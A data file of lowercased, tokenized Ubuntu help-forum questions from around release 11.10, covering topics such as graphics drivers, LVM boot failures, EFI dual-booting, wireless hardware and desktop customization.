91376	login for internet use	how to protect internet access using username and password . i mean that i need a situation , say when anyone opens a browser and trys to go for any site it would redirect to a login page for authentication . after login he/she can access any site . i am pretty sure that this kind of situation is common . how can implement it in ubuntu ? is it handled by apache or dns-server ? thanks in advance . edited : as an example : in an university there are 100 's of computers and 1000 's of students . sometimes it is become difficult to surf internet because of unnecessary download . to prevent download i want to track the bad students . so when anyone wants to access internet he/she has to login first so that i can track him/her .
91378	how do i get `` the witcher ii '' working with wine ?	hi i 'm tring to run the witcher ii with wine on ubuntu 11.10 ... but after that appear the blue screen of wine it close it self and nothing appen ... what could be ? i 'm using wine 1.3.35 . my vide card is an nvidia geforce 220m and the driver is 290.1
91379	how to disable intel gpu on boot without using bios	i have a pavilion dv6-3182ea laptop with an ati/intel hybrid graphics , and i would like to know if it is possible to switch the intel gpu off when ubuntu 11.10 boots , i have tried to mess around with vgaswitcheroo however the fglrx driver removes the folder making any switching impossible . i require the ati card with fglrx drivers because i am trying to see how one of my games runs through wine , but either my intel gpu or ati one without fglrx will not run the game , this has been annoying my for awhile now and i really want to get it fixed . i have come across this piece of code to add to the grub config which switches all gpus on , activates the integrated gpu then switches the discrete one off : grub_cmdline_linux_default= '' quiet splash modeset=1 hybridopts=on , igd , off '' i was wondering if it is possible to modify this to switch to and activate the discrete gpu to allow me to use the fglrx drivers , using them otherwise stops my system booting because xorg.conf is not correct for the integrated gpu to work and prevents the xserver running . i am unable to do this in the bios because hp do not think we should be allowed this basic feature .
91380	what is the difference between ubuntu+xfce and xubuntu ?	there are many derivatives to ubuntu , of which xubuntu is one , using xfce as a desktop environment . one can install xubuntu directly from an iso or install xfce as an alternative session on ubuntu . i am wondering : is there more difference between installing xubuntu from iso and installing xfce to ubuntu ? - if so which are these difference ? - which of the two do you recommend and why ?
91389	how do i connect to a wireless network , turn off bluetooth and airplain mode , on my dell inspiron switch ?	i originally connected to a wireless network at a friends house and it was all gravy . i turned off my bluetooth and suddenly was unable to find any networks at all . ubuntu has apparently confused my wireless card with my bluetooth connection . but my internet server requires me to register my mac address with it in order to gain enternet access . in other words . i ca n't get access unless it 's accessing the net through my wireless card and right now it 's using my bluetooth connection to try and connect . wierd huh ? i have made several attempts to turn on my wireless and it continually shows up grey and inaccessible . it says it 's in airplane mode and i can not get it to turn off airplane mode . every time i do and i exit the network manager it turns right back on , and while i 'm in the network manager and turn off the airplain mode it still will not allow me to turn on my wireless card or access it at all . it recognises that it 's there but will not turn it on . what do i do guys ?
91391	how to transfer files a-la dropbox with an ipad in a lan ?	i use dropbox to transfer file ( ebooks , documents , images ... ) to and from an ipad and 2 ubuntu laptops in the same lan , but it 's a nonsense to move files to the cloud and back again to the same lan . is there a local alternative , such as setting up a samba share , or a ssh/scp/sshfs service , or rsync on the ubuntu pcs , and accessing it via some app on the ipad ?
91393	is there tutorial creation software like wink ?	i am looking for a tutorial creation software like wink in ubuntu 11.10 ( wink is not in the repositories ) . is there anything i can use , that is easy to learn , exports to flash , and possible has audio capability , and of course works in ubuntu versions ( current and upcoming ) ?
91396	my graphics card is not working , everything is really huge	01:00.0 vga compatible controller [ 0300 ] : nvidia corporation device [ 10de:1040 ] ( rev a1 ) thats what i get when i do lspci -nn | grep vga i 'm running ubuntu 10.04 , i 'm getting really annoyed help please..
91397	are there consequences to running 'sudo chmod u+s /sbin/shutdown '	i want to do this so that gshutdown application can shutdown the system when i 'm not there to enter a password . but i 've read on forums that changing linux commands with chmod can cause problems in multi-user systems . can anyone explain why that might be ?
91398	why ca n't i delete my contacts stored in ubuntu one ?	i go to the ubuntone website and select all contacts , then i click on delete . then i click on the conformation to delete . but nothing happens all contacts are still there !
91399	how can i transfer files to a kindle fire with a micro-usb cable ?	i 'm running ubuntu 11.10 , and when i connect my kindle fire to my computer via micro usb , it is not recognized automatically . other usb devices , such as my ipod and digital camera , are recognized just fine . it does not appear to be a usb power issue , since the kindle fire wakes up from sleeping when it is plugged in . i never get the message on the kindle telling me it is ready to accept files from the computer , though . here are the last 15 lines of dmesg after plugging the kindle in : jeff @ prime : ~ $ dmesg | tail -n 15 [ 45918.269671 ] ieee80211 phy0 : wl_ops_bss_info_changed : arp filtering : enabled true , count 1 ( implement ) [ 45929.072149 ] wlan0 : no ipv6 routers present [ 46743.224217 ] usb 1-1 : new high speed usb device number 5 using ehci_hcd [ 46743.364623 ] scsi8 : usb-storage 1-1:1.0 [ 46744.366102 ] scsi 8:0:0:0 : direct-access amazon kindle 0001 pq : 0 ansi : 2 [ 46744.366356 ] scsi : killing requests for dead queue [ 46744.372494 ] scsi : killing requests for dead queue [ 46744.384510 ] scsi : killing requests for dead queue [ 46744.392348 ] scsi : killing requests for dead queue [ 46744.392731 ] scsi : killing requests for dead queue [ 46744.396853 ] scsi : killing requests for dead queue [ 46744.397214 ] scsi : killing requests for dead queue [ 46744.400795 ] scsi : killing requests for dead queue [ 46744.401589 ] sd 8:0:0:0 : attached scsi generic sg2 type 0 [ 46744.407520 ] sd 8:0:0:0 : [ sdb ] attached scsi removable disk and here are my mounted filesystems : jeff @ prime : ~ $ df filesystem 1k-blocks used available use % mounted on /dev/sda1 298594984 174663712 108763480 62 % / udev 1407684 4 1407680 1 % /dev tmpfs 566924 896 566028 1 % /run none 5120 0 5120 0 % /run/lock none 1417308 300 1417008 1 % /run/shm /home/jeff/.private 298594984 174663712 108763480 62 % /home/jeff i should note that , since i got dropbox working on my kindle , the usb is no longer strictly necessary , but as a matter of principle i 'd love to get it working .
91400	how do you run a java program from a bash script ?	i am trying to run a minecraft server from a `` run.sh '' script . so far i have this : # ! /bin/sh java -xms512m -xmx2048m -jar minecraft_server.jar nogui i 'm running the script from the same directory as the minecraft_server.jar , and it does nothing . i want it to open a terminal window that is running the java program . i am new to linux so i 'm sure i 'm doing something stupid , any help would be appreciated .
91401	windows recovery and dual booting	after getting a new toshiba portege laptop i installed ubuntu . at the time i was very naive and i did n't completely know what dual booting meant but now i regret the decision and i 'm looking to dual boot visa along side 11.10 . my original plan was to back up my files and use the vista recovery cds to get windows up then reinstall ubuntu , then select the dual boot option . only problem is toshiba does n't ship recovery cds with their computers and paying 30 bucks for windows seems useless to me . any suggestions as to how i can dual boot windows from ubuntu ?
91403	when to use gconf vs dconf ?	both gconf and dconf editors are available . given the change to dconf should we still be using gconf at all ? do changes in gconf actually do anything when running 11.10 ?
91406	could not update iceauthority file /home/myuser/.iceauthority ldap server	i have set up an ldap server and client machine , but when i go to login it says could not update iceauthority file /home/myuser/.iceauthority . when i look in the users directory on the server there is no .iceauthority file . spent 5 days setting up my ldap server ( noob ) can someone please help , my veins are now popping out of my head . ubuntu 11.10 server with ubuntu 11.10 client
91407	can i bind the media play keyboard button to start banshee if no player is running ?	whenever i hit the media play/pause button while banshee is n't running , this is what i see : i 'd like to have it simply start banshee if it is n't running . is there a way to do this ? i understand that i could probably bind a script to the key , but i do n't want it to run and prevent banshee from receiving the keys when it 's running . any ideas ?
91408	lvm logical volumes fail to activate on boot after 11.04 to 11.10 live upgrade	i have upgraded my server from 11.04 to 11.10 ( 64 bit ) using sudo do-release-upgrade the machine now halts during boot because it ca n't find certain logical volumes in /mnt . when this happens , i hit `` m '' to drop down to a root shell , and i see the following ( forgive me for inaccuracies , i 'm recreating this ) : $ lvs lv vg attr lsize origin snap % move log copy % convert audio vg -wi -- - 372.53g home vg -wi-ao 186.26g swap vg -wi-ao 3.72g the corresponding block devices in /dev are missing for `` audio '' . if i run : $ vgchange -a y $ lvs lv vg attr lsize origin snap % move log copy % convert audio vg -wi-ao 372.53g home vg -wi-ao 186.26g swap vg -wi-ao 3.72g then all lvs are activated and the system continues to boot perfectly after exiting from the root maintenance shell . what is going on , and how would i set the lvs to always be active on boot up ? update to answer questions raised : there is one volume group : # vgs vg # pv # lv # sn attr vsize vfree vg 1 6 0 wz -- n- 1.68t 0 # pvs pv vg fmt attr psize pfree /dev/md2 vg lvm2 a- 1.68t 0 over a raid1 md array consisting of a matched pair of sata hard disks : # cat /proc/mdstat personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md2 : active raid1 sda3 [ 0 ] sdb3 [ 1 ] 1806932928 blocks [ 2/2 ] [ uu ] md1 : active raid1 sda2 [ 0 ] sdb2 [ 1 ] 146484160 blocks [ 2/2 ] [ uu ] md3 : active raid1 sda4 [ 0 ] sdb4 [ 1 ] 95168 blocks [ 2/2 ] [ uu ] unused devices : < none > so : # mount /dev/md1 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) fusectl on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) /dev/md3 on /boot type ext3 ( rw ) /dev/mapper/vg-home on /home type reiserfs ( rw ) /dev/mapper/vg-audio on /mnt/audio type reiserfs ( rw ) rpc_pipefs on /var/lib/nfs/rpc_pipefs type rpc_pipefs ( rw ) nfsd on /proc/fs/nfsd type nfsd ( rw ) update with full lvdisplay - as suspected the partitions that work are first in the list . ca n't see anything odd myself . i 've included the full list here - this is all my lvm partitions . this is from the running machine , if output from the broken state is useful that 'll need some time to obtain . # lvdisplay -- - logical volume -- - lv name /dev/vg/swap vg name vg lv uuid inuotr-gwb8-z0rw-lghm-qtrf-xc7d-bv43ah lv write access read/write lv status available # open 2 lv size 3.72 gib current le 953 segments 1 allocation inherit read ahead sectors auto - currently set to 256 block device 252:0 -- - logical volume -- - lv name /dev/vg/home vg name vg lv uuid 7l34ys-neh0-v5ol-bffd-tmo4-8ckv-gwxurl lv write access read/write lv status available # open 2 lv size 186.26 gib current le 47683 segments 1 allocation inherit read ahead sectors auto - currently set to 256 block device 252:1 -- - logical volume -- - lv name /dev/vg/audio vg name vg lv uuid ax1zg5-vwyk-myvl-dbht-rgp2-dswg-odzlbs lv write access read/write lv status available # open 2 lv size 372.53 gib current le 95367 segments 1 allocation inherit read ahead sectors auto - currently set to 256 block device 252:2 -- - logical volume -- - lv name /dev/vg/vmware vg name vg lv uuid bj0m1h-jndv-gwu8-aepm-gaoo-q0pe-cwhwj2 lv write access read/write lv status available # open 2 lv size 372.53 gib current le 95367 segments 1 allocation inherit read ahead sectors auto - currently set to 256 block device 252:3 -- - logical volume -- - lv name /dev/vg/backup vg name vg lv uuid phdnjd-8ut8-yhb2-8sbw-d7e1-1zws-qx0tp8 lv write access read/write lv status available # open 1 lv size 93.13 gib current le 23841 segments 1 allocation inherit read ahead sectors auto - currently set to 256 block device 252:4 -- - logical volume -- - lv name /dev/vg/download vg name vg lv uuid 64your-pvng-7evg-exns-ek9a-vmdd-eozibm lv write access read/write lv status available # open 2 lv size 695.05 gib current le 177934 segments 2 allocation inherit read ahead sectors auto - currently set to 256 block device 252:5 update 2012/01/28 : a reboot has given an opportunity to look at the machine in its broken state . i do n't know if relevant , but the machine was shut down cleanly but the file systems were not clean on starting up again . # lvs lv vg attr lsize origin snap % move log copy % convert audio vg -wi -- - 372.53g backup vg -wi -- - 93.13g download vg -wi -- - 695.05g home vg -wi-ao 186.26g swap vg -wi-ao 3.72g vmware vg -wi -- - 372.53g although perhaps of interest is ( note download ) : # lvs -- segments lv vg attr # str type ssize audio vg -wi -- - 1 linear 372.53g backup vg -wi -- - 1 linear 93.13g download vg -wi -- - 1 linear 508.79g download vg -wi -- - 1 linear 186.26g home vg -wi-ao 1 linear 186.26g swap vg -wi-ao 1 linear 3.72g vmware vg -wi -- - 1 linear 372.53g more : # lvdisplay -- - logical volume -- - lv name /dev/vg/swap vg name vg lv uuid inuotr-gwb8-z0rw-lghm-qtrf-xc7d-bv43ah lv write access read/write lv status available # open 2 lv size 3.72 gib current le 953 segments 1 allocation inherit read ahead sectors auto - currently set to 256 block device 252:0 -- - logical volume -- - lv name /dev/vg/home vg name vg lv uuid 7l34ys-neh0-v5ol-bffd-tmo4-8ckv-gwxurl lv write access read/write lv status available # open 2 lv size 186.26 gib current le 47683 segments 1 allocation inherit read ahead sectors auto - currently set to 256 block device 252:1 -- - logical volume -- - lv name /dev/vg/audio vg name vg lv uuid ax1zg5-vwyk-myvl-dbht-rgp2-dswg-odzlbs lv write access read/write lv status not available lv size 372.53 gib current le 95367 segments 1 allocation inherit read ahead sectors auto -- - logical volume -- - lv name /dev/vg/vmware vg name vg lv uuid bj0m1h-jndv-gwu8-aepm-gaoo-q0pe-cwhwj2 lv write access read/write lv status not available lv size 372.53 gib current le 95367 segments 1 allocation inherit read ahead sectors auto -- - logical volume -- - lv name /dev/vg/backup vg name vg lv uuid phdnjd-8ut8-yhb2-8sbw-d7e1-1zws-qx0tp8 lv write access read/write lv status not available lv size 93.13 gib current le 23841 segments 1 allocation inherit read ahead sectors auto -- - logical volume -- - lv name /dev/vg/download vg name vg lv uuid 64your-pvng-7evg-exns-ek9a-vmdd-eozibm lv write access read/write lv status not available lv size 695.05 gib current le 177934 segments 2 allocation inherit read ahead sectors auto # vgs vg # pv # lv # sn attr vsize vfree vg 1 6 0 wz -- n- 1.68t 0 # pvs pv vg fmt attr psize pfree /dev/md2 vg lvm2 a- 1.68t 0 from dmesg : [ 0.908322 ] ata3.00 : ata-8 : st32000542as , cc34 , max udma/133 [ 0.908325 ] ata3.00 : 3907029168 sectors , multi 16 : lba48 ncq ( depth 0/32 ) [ 0.908536 ] ata3.01 : ata-8 : st32000542as , cc34 , max udma/133 [ 0.908538 ] ata3.01 : 3907029168 sectors , multi 16 : lba48 ncq ( depth 0/32 ) [ 0.924307 ] ata3.00 : configured for udma/133 [ 0.940315 ] ata3.01 : configured for udma/133 [ 0.940408 ] scsi 2:0:0:0 : direct-access ata st32000542as cc34 pq : 0 ansi : 5 [ 0.940503 ] sd 2:0:0:0 : [ sda ] 3907029168 512-byte logical blocks : ( 2.00 tb/1.81 tib ) [ 0.940541 ] sd 2:0:0:0 : attached scsi generic sg0 type 0 [ 0.940544 ] sd 2:0:0:0 : [ sda ] write protect is off [ 0.940546 ] sd 2:0:0:0 : [ sda ] mode sense : 00 3a 00 00 [ 0.940564 ] sd 2:0:0:0 : [ sda ] write cache : enabled , read cache : enabled , does n't support dpo or fua [ 0.940611 ] scsi 2:0:1:0 : direct-access ata st32000542as cc34 pq : 0 ansi : 5 [ 0.940699 ] sd 2:0:1:0 : attached scsi generic sg1 type 0 [ 0.940728 ] sd 2:0:1:0 : [ sdb ] 3907029168 512-byte logical blocks : ( 2.00 tb/1.81 tib ) [ 0.945319 ] sd 2:0:1:0 : [ sdb ] write protect is off [ 0.945322 ] sd 2:0:1:0 : [ sdb ] mode sense : 00 3a 00 00 [ 0.945660 ] sd 2:0:1:0 : [ sdb ] write cache : enabled , read cache : enabled , does n't support dpo or fua [ 0.993794 ] sda : sda1 sda2 sda3 sda4 [ 1.023974 ] sd 2:0:0:0 : [ sda ] attached scsi disk [ 1.024277 ] sdb : sdb1 sdb2 sdb3 sdb4 [ 1.024529 ] sd 2:0:1:0 : [ sdb ] attached scsi disk [ 1.537688 ] md : bind < sdb3 > [ 1.538922 ] bio : create slab < bio-1 > at 1 [ 1.538983 ] md/raid1 : md2 : active with 2 out of 2 mirrors [ 1.539005 ] md2 : detected capacity change from 0 to 1850299318272 [ 1.540678 ] md2 : unknown partition table [ 1.540851 ] md : bind < sdb4 > [ 1.542231 ] md/raid1 : md3 : active with 2 out of 2 mirrors [ 1.542245 ] md3 : detected capacity change from 0 to 97452032 [ 1.543867 ] md : bind < sdb2 > [ 1.544680 ] md3 : unknown partition table [ 1.545627 ] md/raid1 : md1 : active with 2 out of 2 mirrors [ 1.545642 ] md1 : detected capacity change from 0 to 149999779840 [ 1.556008 ] generic_sse : 9824.000 mb/sec [ 1.556010 ] xor : using function : generic_sse ( 9824.000 mb/sec ) [ 1.556721 ] md : raid6 personality registered for level 6 [ 1.556723 ] md : raid5 personality registered for level 5 [ 1.556724 ] md : raid4 personality registered for level 4 [ 1.560491 ] md : raid10 personality registered for level 10 [ 1.571416 ] md1 : unknown partition table [ 1.935835 ] ext4-fs ( md1 ) : info : recovery required on readonly filesystem [ 1.935838 ] ext4-fs ( md1 ) : write access will be enabled during recovery [ 2.901833 ] ext4-fs ( md1 ) : orphan cleanup on readonly fs [ 2.901840 ] ext4-fs ( md1 ) : ext4_orphan_cleanup : deleting unreferenced inode 4981215 [ 2.901904 ] ext4-fs ( md1 ) : ext4_orphan_cleanup : deleting unreferenced inode 8127848 [ 2.901944 ] ext4-fs ( md1 ) : 2 orphan inodes deleted [ 2.901946 ] ext4-fs ( md1 ) : recovery complete [ 3.343830 ] ext4-fs ( md1 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 64.851211 ] adding 3903484k swap on /dev/mapper/vg-swap . priority : -1 extents:1 across:3903484k [ 67.600045 ] ext4-fs ( md1 ) : re-mounted . opts : errors=remount-ro [ 68.459775 ] ext3-fs : barriers not enabled [ 68.460520 ] kjournald starting . commit interval 5 seconds [ 68.461183 ] ext3-fs ( md3 ) : using internal journal [ 68.461187 ] ext3-fs ( md3 ) : mounted filesystem with ordered data mode [ 130.280048 ] reiserfs ( device dm-1 ) : found reiserfs format `` 3.6 '' with standard journal [ 130.280060 ] reiserfs ( device dm-1 ) : using ordered data mode [ 130.284596 ] reiserfs ( device dm-1 ) : journal params : device dm-1 , size 8192 , journal first block 18 , max trans len 1024 , max batch 900 , max commit age 30 , max trans age 30 [ 130.284918 ] reiserfs ( device dm-1 ) : checking transaction log ( dm-1 ) [ 130.450867 ] reiserfs ( device dm-1 ) : using r5 hash to sort names
91411	grub will not boot ubuntu	this is my first attempt at linux . i 'm trying to dual boot xp sp2 and ubuntu 11.10 . i have the following partitions : primary 115gb windows ntfs primary 1gb /boot ext4 primary 25 gb / ext4 logical 125 gb /home ext4 swap i put the boot loader in the /boot partition . than i modified the boot.ini file and put a grldr and menu.lis file that i downloaded at http : //www.icpug.org.uk/national/linnwin/step1-xp.htm i than used an iso cd to install ubuntu 11.10 . i had to check nomodeset for it to work but it install and i was able to use ubuntu . once i restarted my pc i got the option to choose from windows xp or start linux . windows works fine but when i select start linux it goes to a grub4dos screen with the only option being `` default boot on hd 0 '' which basically reboots my pc . if i press e to edit commands before booting i get `` rootnoverify ( hd0,0 ) '' , `` chainloader +1 '' and a `` boot '' option . how do i get ubuntu to boot ?
91413	reloading iptables	i made changes to iptables config file in /etc/iptables/filter in ubuntu and want to reload them . i read the man page and also googled but could n't find the information . any help will be appreciated . thank you bala
91418	how do i change ubuntu 's gui ?	recently installed a program to change ubuntu 's desktop but went bad , so i uninstalled it but the graphic gui had debriss and stuff all around . had to reinstall ubuntu completely . how do i change ubuntu 's desktop without messing around the system ?
91419	how can i change the default web page at the system level ?	i am trying to change the default web page , so that people using guest-session will open a specific web page instead of the default site . also , please note that when i installed chromium , the ubuntu default page comes up there too . there must be a global variable somewhere . does anyone know where this variable is ?
91420	ubuntu us metric format	i use ubuntu 11.10 with unity/gnome 3 and i want to make the metric system the default . is there a united states metric system format ? in ubuntu in the system settings under keyboard layouts there is format but i see no way to change it to metric , with out changing from united states .
91421	why is n't webm video supported out of the box ?	ubuntu ca n't include non-free codecs , but has had the ability to play ogg theora and vorbis files out-of-the-box for years because they 're open source . now that webm is such a popular , free alternative to h.264 , why is n't support included by default ?
91424	bind a mouse button to show the gnome shell activities overview	i 'm trying bind a button on my mouse to show the gnome shell activities overview . i 'm using xbindkeys to bind actions to my mouse buttons . i tried using the following xte command to show the activities overview : xte 'keydown alt_l ' 'key f1 ' 'keyup alt_l' this works fine when executed in the terminal , but does n't work with xbindkeys for some reason .
91426	reverse two finger scroll direction ?	two-fingered scrolling is working fine , but is there a way that i can reverse the direction ? it seems backwards opposed to the way osx does it .
91435	is it possible to assign a keyboard shortcut to cause the looking glass to appear ?	on ubuntu 11.10 , using gnome shell , i find myself using the `` looking glass '' javascript console very much . i know how to assign desktop shortcuts in general ; but , this seems a little unusual . instead of typing alt+f2lgenter , i 'd like to assign a shortcut key to perform this . however , shortcuts normally require a command file and there 's the rub . i am unaware of a command file for the looking glass tool . how can i set a keyboard shortcut to perform the alt+f2lgenter keystrokes ? clarification : instead of pressing a 4-key sequence , i want to use a 1-key shortcut to invoke lg .
91437	uefi hardware and dual booting with windows	i 've been struggling for 3 days trying to dual boot ubuntu 11.10 and windows 7 . i want to use an ssd for my ubuntu installation and an hdd for windows . i realized that i have to install windows first and then ubuntu , and so i did that . when i first install windows it boots fine from my hdd , but when i add ubuntu on my ssd and restart , i get a black screen with a blinking cursor . i 've read many forums where this is asked but have n't found a single solution that works . i 've tried boot repair . it told me to make a fat esp partition and i did that as well but it still does n't work . i 'm a noob and any suggestions would be really appreciated .
91442	ralink wireles not working for hp dv6 6110	i have a hp pavilion dv6 6110us and i have just put on 10.04 lts because 11.10 does n't work for whatever reason and i like 10.04 better and it is faster . any way here are the facts . my computer has some type of ralink wireless chip . lshw does n't tell me much more than that but here is what it says anyway . *-network unclaimed description : network controller product : ralink vendor : ralink physical id : 0 bus info : pci @ 0000:02:00.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f0200000-f020ffff i am running 64 bit because i have a 64bit amd processor is that the problem ? how do i get my wireless to work ? i encounter this problem in other linux os 's . i have heard of other people having problems with ralink wifi chips , but i do n't know what type mine is and have n't been able to find out . if i do i will cancel this post and inform you of where to go for the answer . anyone else had this problem ? -- sam mercier
91443	installing a nvidia fx 5600 agp to replace sis onboard graphics	my first question so please bear with me . i have a compaq sr1417cl with an asus built k8sla motherboard , amd sempron 1.8ghz cpu and a sis 760 onboard graphics chip . it also has 2gb of ddr ram . i have onieric 11.10 installed on it 's own 120g drive and windows xp installed on a separate 40g drive . everything works ok ... in ubuntu i get nothing but 2d . i am using the gnome classic desktop although unity 2d works as well . i have not even tried installing compiz settings mgr . i can watch streaming video but occasionally if i try to do too much everything freezes..i just hit the power button and restart the hard way..it works ? i guess since there is no such thing as a linux sis driver , i must be using a vesa driver . there are no entries in `` install additional drivers . so , now i want something that let 's me run compiz and use unity 3d..i have bought an nvidia fx 5600 256mb agp 8x card . the mother board will support it . my question is , when i install this card is there anything i should prepare first ? should i remove the vesa driver ? or just install the card and go to additional drivers to see if there is a nvidia driver ? your help is appreciated . i am not real good yet with terminal commands but i follow instructions well . i will be happy to be rid of the sis ... thank you for your time .
91445	how do i remove an icon from the top panel in gnome fallback mode ?	when i right click the filezilla icon , the only options are `` launch '' and `` properties '' . how do i remove it from the top panel ?
91456	how do i fix the problems i 'm having with xfce and xubuntu ?	i booted into a xubuntu session and when the splash disappeared it left behind artifacts on the desktop . i went into desktop to change the background but it stayed completely gray . not only that , gtk is n't theming any of my windows , nor can i change gtk themes in the settings manager . i recently installed gtk+ 2.x alongside gtk+ 3 for a compatibility issue with xfce-battery-plugin , which also refuses to show anything but 0 % . what is going on ?
91460	how to get back lost folders ?	i want to know how to find any folder which has been deleted by accident . i can not find my document , pictures and video folders in $ home . they just disappeared . i tried doing cd ~/documents from the terminal but there seems to be no folder . any idea how to look for them ?
91467	unity brightness indicator does n't work	i followed this tutorial to set the brightness indicator on unity . but when i run the sudo /opt/indicator-brightness/indicator-brightness.py command from a terminal , i get ( indicator-brightness.py:1734 ) : gtk-warning ** : impossible to find the theme engine in module_path : « pixmap » traceback ( most recent call last ) : file `` /opt/indicator-brightness/indicator-brightness.py '' , line 78 , in < module > create_menu ( ind ) file `` /opt/indicator-brightness/indicator-brightness.py '' , line 46 , in create_menu curr_brightness = get_curr_brightness ( ) file `` /opt/indicator-brightness/indicator-brightness.py '' , line 33 , in get_curr_brightness curr_brightness = int ( p.communicate ( ) [ 0 ] ) valueerror : invalid literal for int ( ) with base 10 : 'no backlights were found on your system\n' . any suggestion is most welcome .
91469	how do i hide the unity dock ?	possible duplicates : how can i configure unity ? how to revert to gnome classic ? i 'm a new ubuntu user . how to remove the menu icons in ubuntu ? i have googled and also check each system settings but i find no options . i only use the terminal and start application from terminal - the menu icons is annoyingly ugly and i want to get rid of them .
91471	kubuntu 11.10 running slow and kwin using over 90 %	on 2 netbooks that have been upgraded to 11.10 and are set to auto login , i am finding that everything is running slow and kwin is at over 90 % until i log out and log in again and re-enable desktop effects after which it is running properly again . also , when i log out , i have to log in twice as the first time it only gets to the 2nd icon before dumping me back to the login screen .
91474	totem crashes after continuous usage	this is hard to explain and i 'm unsure if it is a bug . if i watch many different video files in a continuous ( non-stop ) manner , totem eventually causes a system freeze . at first , it says there is a videosink error ; just press ok and close totem , the problem fixes itself ... for a little while . eventually the entire system just seems to freeze , but it 's only the gui . i enter tty using < ctrl > + < alt > +f1 and kill totem using kill -9 $ ( pgrep totem ) . after returning to the desktop using < ctrl > + < alt > +f7 , totem is killed and the problem is gone . i can now repeat the process indefinitely . i have not tested this situation using anything but mkv files and you need a batch of about 60 files and plenty of free time to repeat this . it 's not a problem for regular use ( as i barely watch non-stop videos / tv shows ) . it 's annoying is all and i just want to know if there is a solution . thanks .
91481	why ca n't i get my nvidia 560 ti to work with dual monitors ?	installation method : downloaded 11.10 iso and installed to usb stick with no persistent area , ran ubuntu from the usb stick to check hardware compatability , used the desktop icon to run installer from within running ubuntu , checked the box to download updates while installing , checked the box to allow 3rd party stuff while installing . hardware ( see end of post ) , i7 , geforce gfx 560 ti . launching from usb , ubuntu detected both monitors and i was able to use `` displays '' to configure my monitors . however , i noted that it was running in `` standard '' experience ( unity2d ) . both monitors were correctly identified by `` displays '' . after booting the new install from hd , only one monitor is detected . nvidia drivers were already enabled from within jockey . using sudo nvidia-settings , after much experimentation i was able to get both displays working by using `` twinview '' ( which seems wrong ) . displays shows a single 3200x1080 display of `` unknown '' , '' detect displays '' does nothing , system info shows `` graphics unknown '' and `` experience standard '' is there some way to get it to behave the same way that the `` live '' ubuntu ran ( correctly detecting two monitors and allowing me to configure them directly without going thru the control panel ) and is there a way to get unity 3d to run on this card ? oliver hardware : osmith @ quaver : ~ $ lspci 00:00.0 host bridge : intel corporation 5520/5500/x58 i/o hub to esi port ( rev 12 ) 00:01.0 pci bridge : intel corporation 5520/5500/x58 i/o hub pci express root port 1 ( rev 12 ) 00:03.0 pci bridge : intel corporation 5520/5500/x58 i/o hub pci express root port 3 ( rev 12 ) 00:07.0 pci bridge : intel corporation 5520/5500/x58 i/o hub pci express root port 7 ( rev 12 ) 00:14.0 pic : intel corporation 5520/5500/x58 i/o hub system management registers ( rev 12 ) 00:14.1 pic : intel corporation 5520/5500/x58 i/o hub gpio and scratch pad registers ( rev 12 ) 00:14.2 pic : intel corporation 5520/5500/x58 i/o hub control status and ras registers ( rev 12 ) 00:14.3 pic : intel corporation 5520/5500/x58 i/o hub throttle registers ( rev 12 ) 00:1a.0 usb controller : intel corporation 82801ji ( ich10 family ) usb uhci controller # 4 00:1a.1 usb controller : intel corporation 82801ji ( ich10 family ) usb uhci controller # 5 00:1a.2 usb controller : intel corporation 82801ji ( ich10 family ) usb uhci controller # 6 00:1a.7 usb controller : intel corporation 82801ji ( ich10 family ) usb2 ehci controller # 2 00:1b.0 audio device : intel corporation 82801ji ( ich10 family ) hd audio controller 00:1c.0 pci bridge : intel corporation 82801ji ( ich10 family ) pci express root port 1 00:1c.2 pci bridge : intel corporation 82801ji ( ich10 family ) pci express root port 3 00:1d.0 usb controller : intel corporation 82801ji ( ich10 family ) usb uhci controller # 1 00:1d.1 usb controller : intel corporation 82801ji ( ich10 family ) usb uhci controller # 2 00:1d.2 usb controller : intel corporation 82801ji ( ich10 family ) usb uhci controller # 3 00:1d.7 usb controller : intel corporation 82801ji ( ich10 family ) usb2 ehci controller # 1 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev 90 ) 00:1f.0 isa bridge : intel corporation 82801jir ( ich10r ) lpc interface controller 00:1f.2 sata controller : intel corporation 82801ji ( ich10 family ) sata ahci controller 00:1f.3 smbus : intel corporation 82801ji ( ich10 family ) smbus controller 02:00.0 vga compatible controller : nvidia corporation gf110 [ geforce gtx 560 ti ] ( rev a1 ) 02:00.1 audio device : nvidia corporation device 0e0c ( rev a1 ) 04:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 02 )
91484	how to boot ubuntu from efi/uefi ?	i installed ubuntu 11.10 on a newly bought lenovo thinkcentre edge 71 ( model : 1577-g3g ) with efi boot enabled . i opted for the use entire disk option . even though the installation process went without any problems/errors , when rebooting it now just gives me : no bootable operating system . insert bootable disk and press any key ... i figure this is because of efi . regression : i have checked the system setup ( f1 during post ) to find a bios option to disable efi/uefi boot , however , there is no such option for this machine . this might be caused by a `` secure boot '' feature in the bios . the hardware vendor does not know of any such `` secure boot '' setting in the bios that would prevent linux from booting . lenovo support did not know anything about a bios setting called secure boot . they also did not know of any limitations that would prevent linux from booting . the thinkcentre 1577 bios manual does not mention efi , uefi nor secure boot . how do i install ubuntu on a machine with efi ? - or , since ubuntu is probably already installed : how do i make it boot ubuntu ?
91488	install c shell in ubuntu 11.04 terminal temporarily	one of my friend wants to use c shell in ubuntu 11.04 terminal instead of bash shell for sometime , is there any way to do it without affecting system in any way ?
